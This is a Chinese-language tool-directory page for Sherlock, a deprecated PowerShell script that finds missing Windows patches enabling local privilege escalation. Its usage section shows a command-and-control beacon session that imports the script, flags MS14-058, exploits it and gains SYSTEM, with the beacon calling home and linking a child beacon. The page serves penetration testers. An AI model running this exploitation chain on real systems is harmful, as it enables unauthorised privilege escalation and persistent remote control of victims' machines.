Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Sherlock — 用于快速查找本地权限提升漏洞缺失软件补丁的PowerShell脚本。 | Kitploit
工具/GitHubGitHub/rasta-mouse/sherlock
权限提升漏洞分析漏洞利用后渗透利用渗透测试Archived
GitHubrasta-mouse/sherlock

Sherlock

用于快速查找本地权限提升漏洞缺失软件补丁的PowerShell脚本。

查看仓库
2.0k4097年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

已弃用。请改用 Watson。

Sherlock

用于快速查找缺失的本地权限提升漏洞软件补丁的PowerShell脚本。

当前检测以下漏洞:

  • MS10-015 : 用户模式到环 (KiTrap0D)
  • MS10-092 : 任务计划程序
  • MS13-053 : NTUserMessageCall Win32k 内核池溢出
  • MS13-081 : TrackPopupMenuEx Win32k NULL 页面
  • MS14-058 : TrackPopupMenu Win32k 空指针解引用
  • MS15-051 : ClientCopyImage Win32k
  • MS15-078 : 字体驱动程序缓冲区溢出
  • MS16-016 : 'mrxdav.sys' WebDAV
  • MS16-032 : 辅助登录句柄
  • MS16-034 : Windows 内核模式驱动程序 EoP
  • MS16-135 : Win32k 权限提升
  • CVE-2017-7199 : Nessus Agent 6.6.2 - 6.10.3 权限提升

基本用法:

root@kitploit:~
beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 20 bytes
[*] You are Win7-x64\Rasta

beacon> powershell-import C:\Users\Rasta\Desktop\Sherlock.ps1
[*] Tasked beacon to import: C:\Users\Rasta\Desktop\Sherlock.ps1
[+] host called home, sent: 2960 bytes

beacon> powershell Find-MS14058
[*] Tasked beacon to run: Find-MS14058
[+] host called home, sent: 20 bytes
[+] received output:

Title      : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID      : 2014-4113
Link       : https://www.exploit-db.com/exploits/35101/
VulnStatus : Appears Vulnerable

beacon> elevate ms14-058 smb
[*] Tasked beacon to elevate and spawn windows/beacon_smb/bind_pipe (127.0.0.1:1337)
[+] host called home, sent: 105015 bytes
[+] received output:
[*] Getting Windows version...
[*] Solving symbols...
[*] Requesting Kernel loaded modules...
[*] pZwQuerySystemInformation required length 51216
[*] Parsing SYSTEM_INFO...
[*] 173 Kernel modules found
[*] Checking module \SystemRoot\system32\ntoskrnl.exe
[*] Good! nt found as ntoskrnl.exe at 0x0264f000
[*] ntoskrnl.exe loaded in userspace at: 40000000
[*] pPsLookupProcessByProcessId in kernel: 0xFFFFF800029A21FC
[*] pPsReferencePrimaryToken in kernel: 0xFFFFF800029A59D0
[*] Registering class...
[*] Creating window...
[*] Allocating null page...
[*] Getting PtiCurrent...
[*] Good! dwThreadInfoPtr 0xFFFFF900C1E7B8B0
[*] Creating a fake structure at NULL...
[*] Triggering vulnerability...
[!] Executing payload...

[+] host called home, sent: 204885 bytes
[+] established link to child beacon: 192.168.56.105

beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 8 bytes
[*] You are NT AUTHORITY\SYSTEM (admin)
下载工具